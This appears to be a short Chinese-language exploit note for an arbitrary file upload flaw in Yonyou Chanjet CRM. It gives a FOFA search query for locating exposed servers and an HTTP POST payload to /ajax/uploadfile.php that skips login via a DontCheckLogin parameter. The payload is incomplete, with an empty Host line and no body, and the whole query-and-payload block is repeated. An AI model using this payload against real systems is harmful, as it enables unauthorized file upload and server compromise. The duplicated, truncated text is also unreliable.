Y1-2用友-畅捷通CRM-任意文件上传
fofa语法:
app.name=“用友 CRM”
漏洞复现:
payload:
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
app.name=“用友 CRM”
payload:
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0